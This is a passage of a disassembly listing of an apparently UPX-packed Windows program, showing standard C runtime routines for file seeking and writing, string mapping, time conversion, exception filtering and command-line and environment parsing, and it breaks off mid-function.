======================================= ; Attributes: bp-based frame sub_422510 proc near ; CODE XREF: sub_41C955+40p ; sub_42205D+5Cp var_4 = dword ptr -4 arg_0 = dword ptr 8 arg_4 = dword ptr 0Ch arg_8 = dword ptr 10h push ebp mov ebp, esp sub esp, 4 push ebx push ecx mov eax, [ebp+arg_4] add eax, 0Ch mov [ebp+var_4], eax mov eax, [ebp+arg_0] push ebp push [ebp+arg_8] mov ecx, [ebp+arg_8] mov ebp, [ebp+var_4] call sub_41CC41 push esi push edi call eax pop edi pop esi mov ebx, ebp pop ebp mov ecx, [ebp+arg_8] push ebp mov ebp, ebx cmp ecx, 100h jnz short loc_42254F mov ecx, 2 loc_42254F: ; CODE XREF: sub_422510+38j push ecx call sub_41CC41 pop ebp pop ecx pop ebx leave retn 0Ch sub_422510 endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_42255C proc near ; CODE XREF: sub_421DB1:loc_421F53j ; sub_4220FB:loc_42210Cj ... var_18 = dword ptr -18h var_4 = dword ptr -4 ; FUNCTION CHUNK AT 004247C0 SIZE 00000017 BYTES push ebp mov ebp, esp push 0FFFFFFFFh push offset dword_427908 push offset sub_4234B8 mov eax, large fs:0 push eax mov large fs:0, esp push ecx push ecx push ebx push esi push edi mov [ebp+var_18], esp and [ebp+var_4], 0 mov eax, ds:dword_4DBA08 test eax, eax jz short loc_4225A4 mov [ebp+var_4], 1 call eax jmp short loc_4225A0 ; --------------------------------------------------------------------------- loc_422599: ; DATA XREF: UPX0:00427918o push 1 pop eax retn ; --------------------------------------------------------------------------- loc_42259D: ; DATA XREF: UPX0:0042791Co mov esp, [ebp+var_18] loc_4225A0: ; CODE XREF: sub_42255C+3Bj and [ebp+var_4], 0 loc_4225A4: ; CODE XREF: sub_42255C+30j or [ebp+var_4], 0FFFFFFFFh call $+5 loc_4225AD: ; DATA XREF: UPX0:00427910o jmp loc_4247C0 sub_42255C endp ; sp-analysis failed ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_4225B2 proc near ; CODE XREF: sub_41CAF7+23p ; sub_41CAF7:loc_41CB62p ... var_18 = dword ptr -18h var_4 = dword ptr -4 push ebp mov ebp, esp push 0FFFFFFFFh push offset dword_427920 push offset sub_4234B8 mov eax, large fs:0 push eax mov large fs:0, esp push ecx push ecx push ebx push esi push edi mov [ebp+var_18], esp and [ebp+var_4], 0 mov eax, off_43CFA4 test eax, eax jz short loc_4225FA mov [ebp+var_4], 1 call eax ; sub_42255C jmp short loc_4225F6 ; --------------------------------------------------------------------------- loc_4225EF: ; DATA XREF: UPX0:00427930o push 1 pop eax retn ; --------------------------------------------------------------------------- loc_4225F3: ; DATA XREF: UPX0:00427934o mov esp, [ebp+var_18] loc_4225F6: ; CODE XREF: sub_4225B2+3Bj and [ebp+var_4], 0 loc_4225FA: ; CODE XREF: sub_4225B2+30j or [ebp+var_4], 0FFFFFFFFh call $+5 loc_422603: ; DATA XREF: UPX0:00427928o jmp sub_42255C sub_4225B2 endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_422608 proc near ; CODE XREF: sub_41CFD3+7p ; sub_41CFD3+26p var_8 = byte ptr -8 var_4 = byte ptr -4 arg_0 = dword ptr 8 push ebp mov ebp, esp push ecx push ecx mov eax, ds:dword_4DCFE8 push esi cmp eax, 3 jnz short loc_422631 mov esi, [ebp+arg_0] push esi call sub_41DE77 test eax, eax pop ecx jz short loc_42262E mov eax, [esi-4] sub eax, 9 jmp short loc_422666 ; --------------------------------------------------------------------------- loc_42262E: ; CODE XREF: sub_422608+1Cj push esi jmp short loc_422658 ; --------------------------------------------------------------------------- loc_422631: ; CODE XREF: sub_422608+Ej cmp eax, 2 jnz short loc_422655 lea eax, [ebp+var_4] push eax lea eax, [ebp+var_8] push eax push [ebp+arg_0] call sub_41EBD2 add esp, 0Ch test eax, eax jz short loc_422655 movzx eax, byte ptr [eax] shl eax, 4 jmp short loc_422666 ; --------------------------------------------------------------------------- loc_422655: ; CODE XREF: sub_422608+2Cj ; sub_422608+43j push [ebp+arg_0] loc_422658: ; CODE XREF: sub_422608+27j push 0 push ds:dword_4DCFE4 call dword_427058 ; RtlSizeHeap loc_422666: ; CODE XREF: sub_422608+24j ; sub_422608+4Bj pop esi leave retn sub_422608 endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_422669 proc near ; CODE XREF: sub_41D081+C9p var_24 = byte ptr -24h var_1C = dword ptr -1Ch var_14 = dword ptr -14h var_10 = dword ptr -10h var_8 = dword ptr -8 arg_0 = dword ptr 8 arg_4 = dword ptr 0Ch arg_8 = dword ptr 10h arg_C = dword ptr 14h arg_10 = dword ptr 18h arg_14 = dword ptr 1Ch arg_18 = dword ptr 20h push ebp mov ebp, esp sub esp, 24h push ebx mov ebx, [ebp+arg_0] sub ebx, 76Ch cmp ebx, 46h jl loc_422725 cmp ebx, 8Ah jg loc_422725 push esi push edi mov edi, [ebp+arg_4] mov esi, dword_43D46C[edi*4] add esi, [ebp+arg_8] test bl, 3 jnz short loc_4226A8 cmp edi, 2 jle short loc_4226A8 inc esi loc_4226A8: ; CODE XREF: sub_422669+37j ; sub_422669+3Cj call sub_4247D7 mov eax, ebx lea ecx, [ebx-1] imul eax, 16Dh sar ecx, 2 mov edx, esi mov [ebp+var_8], esi add edx, ecx mov [ebp+var_10], ebx add eax, edx mov edx, [ebp+arg_14] lea ecx, [eax+eax*2] mov eax, [ebp+arg_C] mov [ebp+var_1C], eax lea ecx, [eax+ecx*8] imul ecx, 3Ch add ecx, [ebp+arg_10] imul ecx, 3Ch add ecx, dword_43D388 dec edi cmp [ebp+arg_18], 1 mov [ebp+var_14], edi pop edi pop esi lea ecx, [ecx+edx+7C558180h] mov [ebp+arg_0], ecx jz short loc_42271B cmp [ebp+arg_18], 0FFFFFFFFh jnz short loc_422721 cmp dword_43D38C, 0 jz short loc_422721 lea eax, [ebp+var_24] push eax call sub_424A4A pop ecx mov ecx, [ebp+arg_0] test eax, eax jz short loc_422721 loc_42271B: ; CODE XREF: sub_422669+90j add ecx, dword_43D390 loc_422721: ; CODE XREF: sub_422669+96j ; sub_422669+9Fj ... mov eax, ecx jmp short loc_422728 ; --------------------------------------------------------------------------- loc_422725: ; CODE XREF: sub_422669+13j ; sub_422669+1Fj or eax, 0FFFFFFFFh loc_422728: ; CODE XREF: sub_422669+BAj pop ebx leave retn sub_422669 endp ; =============== S U B R O U T I N E ======================================= sub_42272B proc near ; CODE XREF: sub_41D1EC+67p ; sub_41F11C+1A2p ... arg_0 = dword ptr 4 arg_4 = dword ptr 8 arg_8 = dword ptr 0Ch mov eax, [esp+arg_0] push ebx cmp eax, ds:dword_4DCDA0 push esi push edi jnb short loc_4227AD mov ecx, eax mov esi, eax sar ecx, 5 and esi, 1Fh lea edi, ds:4DCCA0h[ecx*4] shl esi, 3 mov ecx, [edi] test byte ptr [ecx+esi+4], 1 jz short loc_4227AD push eax call sub_4238A2 cmp eax, 0FFFFFFFFh pop ecx jnz short loc_42276F mov ds:dword_4DB958, 9 jmp short loc_4227BE ; --------------------------------------------------------------------------- loc_42276F: ; CODE XREF: sub_42272B+36j push [esp+0Ch+arg_8] push 0 push [esp+14h+arg_4] push eax call dword_42711C ; SetFilePointer mov ebx, eax cmp ebx, 0FFFFFFFFh jnz short loc_42278F call dword_42708C ; RtlGetLastWin32Error jmp short loc_422791 ; --------------------------------------------------------------------------- loc_42278F: ; CODE XREF: sub_42272B+5Aj xor eax, eax loc_422791: ; CODE XREF: sub_42272B+62j test eax, eax jz short loc_42279E push eax call sub_4203DF pop ecx jmp short loc_4227BE ; --------------------------------------------------------------------------- loc_42279E: ; CODE XREF: sub_42272B+68j mov eax, [edi] and byte ptr [eax+esi+4], 0FDh lea eax, [eax+esi+4] mov eax, ebx jmp short loc_4227C1 ; --------------------------------------------------------------------------- loc_4227AD: ; CODE XREF: sub_42272B+Dj ; sub_42272B+2Aj and ds:dword_4DB95C, 0 mov ds:dword_4DB958, 9 loc_4227BE: ; CODE XREF: sub_42272B+42j ; sub_42272B+71j or eax, 0FFFFFFFFh loc_4227C1: ; CODE XREF: sub_42272B+80j pop edi pop esi pop ebx retn sub_42272B endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_4227C5 proc near ; CODE XREF: sub_41D1EC+2Ap var_C = dword ptr -0Ch var_8 = dword ptr -8 var_4 = dword ptr -4 arg_0 = dword ptr 8 push ebp mov ebp, esp sub esp, 0Ch push ebx push esi push edi mov edi, [ebp+arg_0] xor ebx, ebx mov esi, [edi+10h] cmp [edi+4], ebx mov [ebp+var_C], esi jge short loc_4227E1 mov [edi+4], ebx loc_4227E1: ; CODE XREF: sub_4227C5+17j push 1 push ebx push esi call sub_42272B add esp, 0Ch cmp eax, ebx mov [ebp+var_4], eax jl short loc_42284F mov edx, [edi+0Ch] test dx, 108h jnz short loc_422806 sub eax, [edi+4] jmp loc_422918 ; --------------------------------------------------------------------------- loc_422806: ; CODE XREF: sub_4227C5+37j mov eax, [edi] mov ecx, [edi+8] mov ebx, eax sub ebx, ecx test dl, 3 mov [ebp+var_8], ebx jz short loc_422840 mov edx, esi mov ebx, esi sar edx, 5 and ebx, 1Fh mov edx, ds:dword_4DCCA0[edx*4] test byte ptr [edx+ebx*8+4], 80h jz short loc_422857 mov edx, ecx loc_422831: ; CODE XREF: sub_4227C5+79j cmp edx, eax jnb short loc_422857 cmp byte ptr [edx], 0Ah jnz short loc_42283D inc [ebp+var_8] loc_42283D: ; CODE XREF: sub_4227C5+73j inc edx jmp short loc_422831 ; --------------------------------------------------------------------------- loc_422840: ; CODE XREF: sub_4227C5+50j test dl, 80h jnz short loc_422857 mov ds:dword_4DB958, 16h loc_42284F: ; CODE XREF: sub_4227C5+2Dj or eax, 0FFFFFFFFh jmp loc_422918 ; --------------------------------------------------------------------------- loc_422857: ; CODE XREF: sub_4227C5+68j ; sub_4227C5+6Ej ... cmp [ebp+var_4], 0 jnz short loc_422865 mov eax, [ebp+var_8] jmp loc_422918 ; --------------------------------------------------------------------------- loc_422865: ; CODE XREF: sub_4227C5+96j test byte ptr [edi+0Ch], 1 jz loc_422910 mov edx, [edi+4] test edx, edx jnz short loc_42287E and [ebp+var_8], edx jmp loc_422910 ; --------------------------------------------------------------------------- loc_42287E: ; CODE XREF: sub_4227C5+AFj sub eax, ecx add eax, edx mov [ebp+arg_0], eax mov eax, esi sar eax, 5 and esi, 1Fh lea ebx, ds:4DCCA0h[eax*4] shl esi, 3 mov eax, [ebx] test byte ptr [esi+eax+4], 80h jz short loc_42290A push 2 push 0 push [ebp+var_C] call sub_42272B add esp, 0Ch cmp eax, [ebp+var_4] jnz short loc_4228D1 mov eax, [edi+8] mov ecx, [ebp+arg_0] add ecx, eax loc_4228BC: ; CODE XREF: sub_4227C5+104j cmp eax, ecx jnb short loc_4228CB cmp byte ptr [eax], 0Ah jnz short loc_4228C8 inc [ebp+arg_0] loc_4228C8: ; CODE XREF: sub_4227C5+FEj inc eax jmp short loc_4228BC ; --------------------------------------------------------------------------- loc_4228CB: ; CODE XREF: sub_4227C5+F9j test byte ptr [edi+0Dh], 20h jmp short loc_422905 ; --------------------------------------------------------------------------- loc_4228D1: ; CODE XREF: sub_4227C5+EDj push 0 push [ebp+var_4] push [ebp+var_C] call sub_42272B mov eax, 200h add esp, 0Ch cmp [ebp+arg_0], eax ja short loc_4228F8 mov ecx, [edi+0Ch] test cl, 8 jz short loc_4228F8 test ch, 4 jz short loc_4228FB loc_4228F8: ; CODE XREF: sub_4227C5+124j ; sub_4227C5+12Cj mov eax, [edi+18h] loc_4228FB: ; CODE XREF: sub_4227C5+131j mov [ebp+arg_0], eax mov eax, [ebx] test byte ptr [esi+eax+4], 4 loc_422905: ; CODE XREF: sub_4227C5+10Aj jz short loc_42290A inc [ebp+arg_0] loc_42290A: ; CODE XREF: sub_4227C5+D9j ; sub_4227C5:loc_422905j mov eax, [ebp+arg_0] sub [ebp+var_4], eax loc_422910: ; CODE XREF: sub_4227C5+A4j ; sub_4227C5+B4j mov eax, [ebp+var_8] mov ecx, [ebp+var_4] add eax, ecx loc_422918: ; CODE XREF: sub_4227C5+3Cj ; sub_4227C5+8Dj ... pop edi pop esi pop ebx leave retn sub_4227C5 endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_42291D proc near ; CODE XREF: sub_41D2B4+A2p ; sub_41DB8B+2Cp ... var_414 = byte ptr -414h var_10 = dword ptr -10h var_C = dword ptr -0Ch var_8 = dword ptr -8 var_4 = dword ptr -4 arg_0 = dword ptr 8 arg_4 = dword ptr 0Ch arg_8 = dword ptr 10h push ebp mov ebp, esp sub esp, 414h mov ecx, [ebp+arg_0] push ebx cmp ecx, ds:dword_4DCDA0 push esi push edi jnb loc_422AB1 mov eax, ecx mov esi, ecx sar eax, 5 and esi, 1Fh lea ebx, ds:4DCCA0h[eax*4] shl esi, 3 mov eax, [ebx] mov al, [eax+esi+4] test al, 1 jz loc_422AB1 xor edi, edi cmp [ebp+arg_8], edi mov [ebp+var_8], edi mov [ebp+var_10], edi jnz short loc_42296E loc_422967: ; CODE XREF: sub_42291D+177j xor eax, eax jmp loc_422AC5 ; --------------------------------------------------------------------------- loc_42296E: ; CODE XREF: sub_42291D+48j test al, 20h jz short loc_42297E push 2 push edi push ecx call sub_42272B add esp, 0Ch loc_42297E: ; CODE XREF: sub_42291D+53j mov eax, [ebx] add eax, esi test byte ptr [eax+4], 80h jz loc_422A4D mov eax, [ebp+arg_4] cmp [ebp+arg_8], edi mov [ebp+var_4], eax mov [ebp+arg_0], edi jbe loc_422A85 loc_42299E: ; CODE XREF: sub_42291D+F5j lea eax, [ebp+var_414] loc_4229A4: ; CODE XREF: sub_42291D+B9j mov ecx, [ebp+var_4] sub ecx, [ebp+arg_4] cmp ecx, [ebp+arg_8] jnb short loc_4229D8 mov ecx, [ebp+var_4] inc [ebp+var_4] mov cl, [ecx] cmp cl, 0Ah jnz short loc_4229C3 inc [ebp+var_10] mov byte ptr [eax], 0Dh inc eax loc_4229C3: ; CODE XREF: sub_42291D+9Dj mov [eax], cl inc eax mov ecx, eax lea edx, [ebp+var_414] sub ecx, edx cmp ecx, 400h jl short loc_4229A4 loc_4229D8: ; CODE XREF: sub_42291D+90j mov edi, eax lea eax, [ebp+var_414] sub edi, eax lea eax, [ebp+var_C] push 0 push eax lea eax, [ebp+var_414] push edi push eax mov eax, [ebx] push dword ptr [eax+esi] call dword_4270E0 ; WriteFile test eax, eax jz short loc_422A42 mov eax, [ebp+var_C] add [ebp+var_8], eax cmp eax, edi jl short loc_422A14 mov eax, [ebp+var_4] sub eax, [ebp+arg_4] cmp eax, [ebp+arg_8] jb short loc_42299E loc_422A14: ; CODE XREF: sub_42291D+EAj ; sub_42291D+12Ej xor edi, edi loc_422A16: ; CODE XREF: sub_42291D+150j ; sub_42291D+15Bj mov eax, [ebp+var_8] cmp eax, edi jnz loc_422AAC cmp [ebp+arg_0], edi jz short loc_422A85 push 5 pop eax cmp [ebp+arg_0], eax jnz short loc_422A7A mov ds:dword_4DB958, 9 mov ds:dword_4DB95C, eax jmp loc_422AC2 ; --------------------------------------------------------------------------- loc_422A42: ; CODE XREF: sub_42291D+E0j call dword_42708C ; RtlGetLastWin32Error mov [ebp+arg_0], eax jmp short loc_422A14 ; --------------------------------------------------------------------------- loc_422A4D: ; CODE XREF: sub_42291D+69j lea ecx, [ebp+var_C] push edi push ecx push [ebp+arg_8] push [ebp+arg_4] push dword ptr [eax] call dword_4270E0 ; WriteFile test eax, eax jz short loc_422A6F mov eax, [ebp+var_C] mov [ebp+arg_0], edi mov [ebp+var_8], eax jmp short loc_422A16 ; --------------------------------------------------------------------------- loc_422A6F: ; CODE XREF: sub_42291D+145j call dword_42708C ; RtlGetLastWin32Error mov [ebp+arg_0], eax jmp short loc_422A16 ; --------------------------------------------------------------------------- loc_422A7A: ; CODE XREF: sub_42291D+10Fj push [ebp+arg_0] call sub_4203DF pop ecx jmp short loc_422AC2 ; --------------------------------------------------------------------------- loc_422A85: ; CODE XREF: sub_42291D+7Bj ; sub_42291D+107j mov eax, [ebx] test byte ptr [eax+esi+4], 40h jz short loc_422A9A mov eax, [ebp+arg_4] cmp byte ptr [eax], 1Ah jz loc_422967 loc_422A9A: ; CODE XREF: sub_42291D+16Fj mov ds:dword_4DB958, 1Ch mov ds:dword_4DB95C, edi jmp short loc_422AC2 ; --------------------------------------------------------------------------- loc_422AAC: ; CODE XREF: sub_42291D+FEj sub eax, [ebp+var_10] jmp short loc_422AC5 ; --------------------------------------------------------------------------- loc_422AB1: ; CODE XREF: sub_42291D+15j ; sub_42291D+37j and ds:dword_4DB95C, 0 mov ds:dword_4DB958, 9 loc_422AC2: ; CODE XREF: sub_42291D+120j ; sub_42291D+166j ... or eax, 0FFFFFFFFh loc_422AC5: ; CODE XREF: sub_42291D+4Cj ; sub_42291D+192j pop edi pop esi pop ebx leave retn sub_42291D endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_422ACA proc near ; CODE XREF: sub_41D5AA+47p ; sub_41D5AA+74p ... var_28 = dword ptr -28h var_24 = dword ptr -24h var_20 = dword ptr -20h var_1C = dword ptr -1Ch var_18 = dword ptr -18h var_10 = dword ptr -10h var_4 = dword ptr -4 arg_0 = dword ptr 8 arg_4 = dword ptr 0Ch arg_8 = dword ptr 10h arg_C = dword ptr 14h arg_10 = dword ptr 18h arg_14 = dword ptr 1Ch arg_18 = dword ptr 20h arg_1C = dword ptr 24h push ebp mov ebp, esp push 0FFFFFFFFh push offset dword_427940 push offset sub_4234B8 mov eax, large fs:0 push eax mov large fs:0, esp sub esp, 1Ch push ebx push esi push edi mov [ebp+var_18], esp xor edi, edi cmp ds:dword_4DBA2C, edi jnz short loc_422B40 push edi push edi push 1 pop ebx push ebx push offset dword_427938 mov esi, 100h push esi push edi call dword_427050 ; LCMapStringW test eax, eax jz short loc_422B1E mov ds:dword_4DBA2C, ebx jmp short loc_422B40 ; --------------------------------------------------------------------------- loc_422B1E: ; CODE XREF: sub_422ACA+4Aj push edi push edi push ebx push offset dword_4CB50C push esi push edi call dword_427054 ; LCMapStringA test eax, eax jz loc_422C58 mov ds:dword_4DBA2C, 2 loc_422B40: ; CODE XREF: sub_422ACA+2Ej ; sub_422ACA+52j cmp [ebp+arg_C], edi jle short loc_422B55 push [ebp+arg_C] push [ebp+arg_8] call sub_426180 pop ecx pop ecx mov [ebp+arg_C], eax loc_422B55: ; CODE XREF: sub_422ACA+79j mov eax, ds:dword_4DBA2C cmp eax, 2 jnz short loc_422B7C push [ebp+arg_14] push [ebp+arg_10] push [ebp+arg_C] push [ebp+arg_8] push [ebp+arg_4] push [ebp+arg_0] call dword_427054 ; LCMapStringA jmp loc_422C5A ; --------------------------------------------------------------------------- loc_422B7C: ; CODE XREF: sub_422ACA+93j cmp eax, 1 jnz loc_422C58 cmp [ebp+arg_18], edi jnz short loc_422B92 mov eax, ds:dword_4DBA24 mov [ebp+arg_18], eax loc_422B92: ; CODE XREF: sub_422ACA+BEj push edi push edi push [ebp+arg_C] push [ebp+arg_8] mov eax, [ebp+arg_1C] neg eax sbb eax, eax and eax, 8 inc eax push eax push [ebp+arg_18] call dword_427180 ; MultiByteToWideChar mov ebx, eax mov [ebp+var_1C], ebx cmp ebx, edi jz loc_422C58 mov [ebp+var_4], edi lea eax, [ebx+ebx] add eax, 3 and al, 0FCh call sub_41BB20 mov [ebp+var_18], esp mov eax, esp mov [ebp+var_24], eax or [ebp+var_4], 0FFFFFFFFh jmp short loc_422BED ; --------------------------------------------------------------------------- push 1 pop eax retn ; --------------------------------------------------------------------------- mov esp, [ebp+var_18] xor edi, edi mov [ebp+var_24], edi or [ebp+var_4], 0FFFFFFFFh mov ebx, [ebp+var_1C] loc_422BED: ; CODE XREF: sub_422ACA+10Ej cmp [ebp+var_24], edi jz short loc_422C58 push ebx push [ebp+var_24] push [ebp+arg_C] push [ebp+arg_8] push 1 push [ebp+arg_18] call dword_427180 ; MultiByteToWideChar test eax, eax jz short loc_422C58 push edi push edi push ebx push [ebp+var_24] push [ebp+arg_4] push [ebp+arg_0] call dword_427050 ; LCMapStringW mov esi, eax mov [ebp+var_28], esi cmp esi, edi jz short loc_422C58 test byte ptr [ebp+arg_4+1], 4 jz short loc_422C6C cmp [ebp+arg_14], edi jz loc_422CE7 cmp esi, [ebp+arg_14] jg short loc_422C58 push [ebp+arg_14] push [ebp+arg_10] push ebx push [ebp+var_24] push [ebp+arg_4] push [ebp+arg_0] call dword_427050 ; LCMapStringW test eax, eax jnz loc_422CE7 loc_422C58: ; CODE XREF: sub_422ACA+66j ; sub_422ACA+B5j ... xor eax, eax loc_422C5A: ; CODE XREF: sub_422ACA+ADj ; sub_422ACA+21Fj lea esp, [ebp-38h] mov ecx, [ebp+var_10] mov large fs:0, ecx pop edi pop esi pop ebx leave retn ; --------------------------------------------------------------------------- loc_422C6C: ; CODE XREF: sub_422ACA+160j mov [ebp+var_4], 1 lea eax, [esi+esi] add eax, 3 and al, 0FCh call sub_41BB20 mov [ebp+var_18], esp mov ebx, esp mov [ebp+var_20], ebx or [ebp+var_4], 0FFFFFFFFh jmp short loc_422CA0 ; --------------------------------------------------------------------------- push 1 pop eax retn ; --------------------------------------------------------------------------- mov esp, [ebp+var_18] xor edi, edi xor ebx, ebx or [ebp+var_4], 0FFFFFFFFh mov esi, [ebp+var_28] loc_422CA0: ; CODE XREF: sub_422ACA+1C2j cmp ebx, edi jz short loc_422C58 push esi push ebx push [ebp+var_1C] push [ebp+var_24] push [ebp+arg_4] push [ebp+arg_0] call dword_427050 ; LCMapStringW test eax, eax jz short loc_422C58 cmp [ebp+arg_14], edi push edi push edi jnz short loc_422CC7 push edi push edi jmp short loc_422CCD ; --------------------------------------------------------------------------- loc_422CC7: ; CODE XREF: sub_422ACA+1F7j push [ebp+arg_14] push [ebp+arg_10] loc_422CCD: ; CODE XREF: sub_422ACA+1FBj push esi push ebx push 220h push [ebp+arg_18] call dword_42717C ; WideCharToMultiByte mov esi, eax cmp esi, edi jz loc_422C58 loc_422CE7: ; CODE XREF: sub_422ACA+165j ; sub_422ACA+188j mov eax, esi jmp loc_422C5A sub_422ACA endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_422CEE proc near ; CODE XREF: UPX0:0041DA16p arg_0 = dword ptr 8 arg_4 = dword ptr 0Ch push ebp mov ebp, esp push ebx push [ebp+arg_0] call sub_422E2F test eax, eax pop ecx jz loc_422E23 mov ebx, [eax+8] test ebx, ebx jz loc_422E23 cmp ebx, 5 jnz short loc_422D1F and dword ptr [eax+8], 0 push 1 pop eax jmp loc_422E2C ; --------------------------------------------------------------------------- loc_422D1F: ; CODE XREF: sub_422CEE+23j cmp ebx, 1 jz loc_422E1E mov ecx, ds:dword_4DBA30 mov [ebp+arg_0], ecx mov ecx, [ebp+arg_4] mov ds:dword_4DBA30, ecx mov ecx, [eax+4] cmp ecx, 8 jnz loc_422E0E mov ecx, dword_43D020 mov edx, dword_43D024 add edx, ecx push esi cmp ecx, edx jge short loc_422D6E lea esi, [ecx+ecx*2] sub edx, ecx lea esi, ds:43CFB0h[esi*4] loc_422D65: ; CODE XREF: sub_422CEE+7Ej and dword ptr [esi], 0 add esi, 0Ch dec edx jnz short loc_422D65 loc_422D6E: ; CODE XREF: sub_422CEE+69j mov eax, [eax] mov esi, dword_43D02C cmp eax, 0C000008Eh jnz short loc_422D89 mov dword_43D02C, 83h jmp short loc_422DF9 ; --------------------------------------------------------------------------- loc_422D89: ; CODE XREF: sub_422CEE+8Dj cmp eax, 0C0000090h jnz short loc_422D9C mov dword_43D02C, 81h jmp short loc_422DF9 ; --------------------------------------------------------------------------- loc_422D9C: ; CODE XREF: sub_422CEE+A0j cmp eax, 0C0000091h jnz short loc_422DAF mov dword_43D02C, 84h jmp short loc_422DF9 ; --------------------------------------------------------------------------- loc_422DAF: ; CODE XREF: sub_422CEE+B3j cmp eax, 0C0000093h jnz short loc_422DC2 mov dword_43D02C, 85h jmp short loc_422DF9 ; --------------------------------------------------------------------------- loc_422DC2: ; CODE XREF: sub_422CEE+C6j cmp eax, 0C000008Dh jnz short loc_422DD5 mov dword_43D02C, 82h jmp short loc_422DF9 ; --------------------------------------------------------------------------- loc_422DD5: ; CODE XREF: sub_422CEE+D9j cmp eax, 0C000008Fh jnz short loc_422DE8 mov dword_43D02C, 86h jmp short loc_422DF9 ; --------------------------------------------------------------------------- loc_422DE8: ; CODE XREF: sub_422CEE+ECj cmp eax, 0C0000092h jnz short loc_422DF9 mov dword_43D02C, 8Ah loc_422DF9: ; CODE XREF: sub_422CEE+99j ; sub_422CEE+ACj ... push dword_43D02C push 8 call ebx pop ecx mov dword_43D02C, esi pop ecx pop esi jmp short loc_422E16 ; --------------------------------------------------------------------------- loc_422E0E: ; CODE XREF: sub_422CEE+52j and dword ptr [eax+8], 0 push ecx call ebx pop ecx loc_422E16: ; CODE XREF: sub_422CEE+11Ej mov eax, [ebp+arg_0] mov ds:dword_4DBA30, eax loc_422E1E: ; CODE XREF: sub_422CEE+34j or eax, 0FFFFFFFFh jmp short loc_422E2C ; --------------------------------------------------------------------------- loc_422E23: ; CODE XREF: sub_422CEE+Fj ; sub_422CEE+1Aj push [ebp+arg_4] call dword_42704C ; UnhandledExceptionFilter loc_422E2C: ; CODE XREF: sub_422CEE+2Cj ; sub_422CEE+133j pop ebx pop ebp retn sub_422CEE endp ; =============== S U B R O U T I N E ======================================= sub_422E2F proc near ; CODE XREF: sub_422CEE+7p arg_0 = dword ptr 4 mov edx, [esp+arg_0] mov ecx, dword_43D028 cmp dword_43CFA8, edx push esi mov eax, offset dword_43CFA8 jz short loc_422E5C lea esi, [ecx+ecx*2] lea esi, ds:43CFA8h[esi*4] loc_422E51: ; CODE XREF: sub_422E2F+2Bj add eax, 0Ch cmp eax, esi jnb short loc_422E5C cmp [eax], edx jnz short loc_422E51 loc_422E5C: ; CODE XREF: sub_422E2F+16j ; sub_422E2F+27j lea ecx, [ecx+ecx*2] pop esi lea ecx, ds:43CFA8h[ecx*4] cmp eax, ecx jnb short loc_422E6F cmp [eax], edx jz short locret_422E71 loc_422E6F: ; CODE XREF: sub_422E2F+3Aj xor eax, eax locret_422E71: ; CODE XREF: sub_422E2F+3Ej retn sub_422E2F endp ; =============== S U B R O U T I N E ======================================= sub_422E72 proc near ; CODE XREF: UPX0:0041D9D8p cmp ds:dword_4DCFF4, 0 jnz short loc_422E80 call sub_42026D loc_422E80: ; CODE XREF: sub_422E72+7j push esi mov esi, ds:dword_4DCFEC mov al, [esi] cmp al, 22h jnz short loc_422EB2 loc_422E8D: ; CODE XREF: sub_422E72+33j ; sub_422E72+36j mov al, [esi+1] inc esi cmp al, 22h jz short loc_422EAA test al, al jz short loc_422EAA movzx eax, al push eax call sub_424D36 test eax, eax pop ecx jz short loc_422E8D inc esi jmp short loc_422E8D ; --------------------------------------------------------------------------- loc_422EAA: ; CODE XREF: sub_422E72+21j ; sub_422E72+25j cmp byte ptr [esi], 22h jnz short loc_422EBC loc_422EAF: ; CODE XREF: sub_422E72+52j inc esi jmp short loc_422EBC ; --------------------------------------------------------------------------- loc_422EB2: ; CODE XREF: sub_422E72+19j cmp al, 20h jbe short loc_422EBC loc_422EB6: ; CODE XREF: sub_422E72+48j inc esi cmp byte ptr [esi], 20h ja short loc_422EB6 loc_422EBC: ; CODE XREF: sub_422E72+3Bj ; sub_422E72+3Ej ... mov al, [esi] test al, al jz short loc_422EC6 cmp al, 20h jbe short loc_422EAF loc_422EC6: ; CODE XREF: sub_422E72+4Ej mov eax, esi pop esi retn sub_422E72 endp ; =============== S U B R O U T I N E ======================================= sub_422ECA proc near ; CODE XREF: UPX0:0041D9C1p push ebx xor ebx, ebx cmp ds:dword_4DCFF4, ebx push esi push edi jnz short loc_422EDC call sub_42026D loc_422EDC: ; CODE XREF: sub_422ECA+Bj mov esi, ds:dword_4DB9C8 xor edi, edi loc_422EE4: ; CODE XREF: sub_422ECA+30j mov al, [esi] cmp al, bl jz short loc_422EFC cmp al, 3Dh jz short loc_422EEF inc edi loc_422EEF: ; CODE XREF: sub_422ECA+22j push esi call sub_41AFE0 pop ecx lea esi, [esi+eax+1] jmp short loc_422EE4 ; --------------------------------------------------------------------------- loc_422EFC: ; CODE XREF: sub_422ECA+1Ej lea eax, ds:4[edi*4] push eax call sub_41B4D5 mov esi, eax pop ecx cmp esi, ebx mov ds:dword_4DB980, esi jnz short loc_422F1E push 9 call sub_41DA29 pop ecx loc_422F1E: ; CODE XREF: sub_422ECA+4Aj mov edi, ds:dword_4DB9C8 cmp [edi], bl jz short loc_422F61 push ebp loc_422F29: ; CODE XREF: sub_422ECA+94j push edi call sub_41AFE0 mov ebp, eax pop ecx inc ebp cmp byte ptr [edi], 3Dh jz short loc_422F5A push ebp call sub_41B4D5 cmp eax, ebx pop ecx mov [esi], eax jnz short loc_422F4D push 9 call sub_41DA29 pop ecx loc_422F4D: ; CODE XREF: sub_422ECA+79j push edi push dword ptr [esi] call sub_41BEB0 pop ecx add esi, 4 pop ecx loc_422F5A: ; CODE XREF: sub_422ECA+6Cj add edi, ebp cmp [edi], bl jnz short loc_422F29 pop ebp loc_422F61: ; CODE XREF: sub_422ECA+5Cj push ds:dword_4DB9C8 call sub_41B0B1 pop ecx mov ds:dword_4DB9C8, ebx mov [esi], ebx pop edi pop esi mov ds:dword_4DCFF0, 1 pop ebx retn sub_422ECA endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_422F83 proc near ; CODE XREF: UPX0:0041D9BCp var_8 = dword ptr -8 var_4 = dword ptr -4 push ebp mov ebp, esp push 